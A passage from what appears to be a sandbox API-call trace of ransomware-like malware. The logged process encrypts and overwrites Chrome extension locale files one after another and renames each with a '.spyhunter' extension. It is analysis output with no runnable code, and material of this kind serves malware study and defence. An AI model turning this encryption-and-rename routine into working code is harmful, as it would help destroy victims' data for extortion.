Size=0x2840) returned 0x2c321c8 [0137.321] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3fc*=0x109, lpOverlapped=0x0) returned 1 [0137.322] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.322] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x57f3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3fc*=0x109, lpOverlapped=0x0) returned 1 [0137.322] GetProcessHeap () returned 0x2c0000 [0137.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.322] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.323] WriteFile (in: hFile=0x18c, lpBuffer=0x57f43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3fc, lpOverlapped=0x0 | out: lpBuffer=0x57f43c*, lpNumberOfBytesWritten=0x57f3fc*=0x4, lpOverlapped=0x0) returned 1 [0137.323] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3fc*=0x30, lpOverlapped=0x0) returned 1 [0137.323] CloseHandle (hObject=0x18c) returned 1 [0137.323] GetProcessHeap () returned 0x2c0000 [0137.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.323] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.spyhunter") returned 168 [0137.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.spyhunter")) returned 1 [0137.324] GetProcessHeap () returned 0x2c0000 [0137.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.324] GetProcessHeap () returned 0x2c0000 [0137.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.324] GetProcessHeap () returned 0x2c0000 [0137.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05e08 | out: hHeap=0x2c0000) returned 1 [0137.325] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f438 | out: pbBuffer=0x57f438) returned 1 [0137.325] GetProcessHeap () returned 0x2c0000 [0137.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.325] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f430*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f430*=0x30) returned 1 [0137.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.326] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0137.326] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.326] GetProcessHeap () returned 0x2c0000 [0137.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.326] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3f4*=0xb2, lpOverlapped=0x0) returned 1 [0137.327] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.327] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x57f3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3f4*=0xb2, lpOverlapped=0x0) returned 1 [0137.327] GetProcessHeap () returned 0x2c0000 [0137.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.327] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.327] WriteFile (in: hFile=0x18c, lpBuffer=0x57f434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3f4, lpOverlapped=0x0 | out: lpBuffer=0x57f434*, lpNumberOfBytesWritten=0x57f3f4*=0x4, lpOverlapped=0x0) returned 1 [0137.327] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3f4*=0x30, lpOverlapped=0x0) returned 1 [0137.327] CloseHandle (hObject=0x18c) returned 1 [0137.327] GetProcessHeap () returned 0x2c0000 [0137.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.328] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.spyhunter") returned 168 [0137.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.spyhunter")) returned 1 [0137.328] GetProcessHeap () returned 0x2c0000 [0137.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.328] GetProcessHeap () returned 0x2c0000 [0137.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.328] GetProcessHeap () returned 0x2c0000 [0137.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c80 | out: hHeap=0x2c0000) returned 1 [0137.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f430 | out: pbBuffer=0x57f430) returned 1 [0137.330] GetProcessHeap () returned 0x2c0000 [0137.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.330] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f428*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f428*=0x30) returned 1 [0137.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.330] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0137.330] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.330] GetProcessHeap () returned 0x2c0000 [0137.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.330] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3ec*=0x12a, lpOverlapped=0x0) returned 1 [0137.336] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffed6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.336] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x57f3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3ec*=0x12a, lpOverlapped=0x0) returned 1 [0137.336] GetProcessHeap () returned 0x2c0000 [0137.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.336] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.336] WriteFile (in: hFile=0x18c, lpBuffer=0x57f42c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3ec, lpOverlapped=0x0 | out: lpBuffer=0x57f42c*, lpNumberOfBytesWritten=0x57f3ec*=0x4, lpOverlapped=0x0) returned 1 [0137.336] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3ec*=0x30, lpOverlapped=0x0) returned 1 [0137.336] CloseHandle (hObject=0x18c) returned 1 [0137.337] GetProcessHeap () returned 0x2c0000 [0137.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.337] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.spyhunter") returned 165 [0137.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0137.337] GetProcessHeap () returned 0x2c0000 [0137.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.338] GetProcessHeap () returned 0x2c0000 [0137.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.338] GetProcessHeap () returned 0x2c0000 [0137.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e948 | out: hHeap=0x2c0000) returned 1 [0137.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f428 | out: pbBuffer=0x57f428) returned 1 [0137.339] GetProcessHeap () returned 0x2c0000 [0137.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f420*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f420*=0x30) returned 1 [0137.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0137.340] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.340] GetProcessHeap () returned 0x2c0000 [0137.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.340] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3e4*=0xc1, lpOverlapped=0x0) returned 1 [0137.341] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.341] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xc1, lpNumberOfBytesWritten=0x57f3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3e4*=0xc1, lpOverlapped=0x0) returned 1 [0137.342] GetProcessHeap () returned 0x2c0000 [0137.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.342] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.342] WriteFile (in: hFile=0x18c, lpBuffer=0x57f424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3e4, lpOverlapped=0x0 | out: lpBuffer=0x57f424*, lpNumberOfBytesWritten=0x57f3e4*=0x4, lpOverlapped=0x0) returned 1 [0137.342] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3e4*=0x30, lpOverlapped=0x0) returned 1 [0137.342] CloseHandle (hObject=0x18c) returned 1 [0137.342] GetProcessHeap () returned 0x2c0000 [0137.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.342] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.spyhunter") returned 165 [0137.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0137.352] GetProcessHeap () returned 0x2c0000 [0137.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.352] GetProcessHeap () returned 0x2c0000 [0137.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.352] GetProcessHeap () returned 0x2c0000 [0137.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e328 | out: hHeap=0x2c0000) returned 1 [0137.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f420 | out: pbBuffer=0x57f420) returned 1 [0137.353] GetProcessHeap () returned 0x2c0000 [0137.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f418*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f418*=0x30) returned 1 [0137.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0137.354] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.354] GetProcessHeap () returned 0x2c0000 [0137.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.354] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3dc*=0xac, lpOverlapped=0x0) returned 1 [0137.355] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.355] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x57f3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3dc*=0xac, lpOverlapped=0x0) returned 1 [0137.355] GetProcessHeap () returned 0x2c0000 [0137.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.355] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.355] WriteFile (in: hFile=0x18c, lpBuffer=0x57f41c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3dc, lpOverlapped=0x0 | out: lpBuffer=0x57f41c*, lpNumberOfBytesWritten=0x57f3dc*=0x4, lpOverlapped=0x0) returned 1 [0137.355] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f3dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f3dc*=0x30, lpOverlapped=0x0) returned 1 [0137.355] CloseHandle (hObject=0x18c) returned 1 [0137.355] GetProcessHeap () returned 0x2c0000 [0137.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.356] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.spyhunter") returned 165 [0137.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0137.356] GetProcessHeap () returned 0x2c0000 [0137.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.356] GetProcessHeap () returned 0x2c0000 [0137.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.356] GetProcessHeap () returned 0x2c0000 [0137.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e018 | out: hHeap=0x2c0000) returned 1 [0137.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f418 | out: pbBuffer=0x57f418) returned 1 [0137.359] GetProcessHeap () returned 0x2c0000 [0137.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.359] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f410*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f410*=0x30) returned 1 [0137.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0137.359] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.360] GetProcessHeap () returned 0x2c0000 [0137.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.360] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f3d4*=0xad, lpOverlapped=0x0) returned 1 [0137.361] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.361] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x57f3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f3d4*=0xad, lpOverlapped=0x0) returned 1 [0137.361] GetProcessHeap () returned 0x2c0000 [0137.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.361] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.361] WriteFile (in: hFile=0x18c, lpBuffer=0x57f414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f3d4, 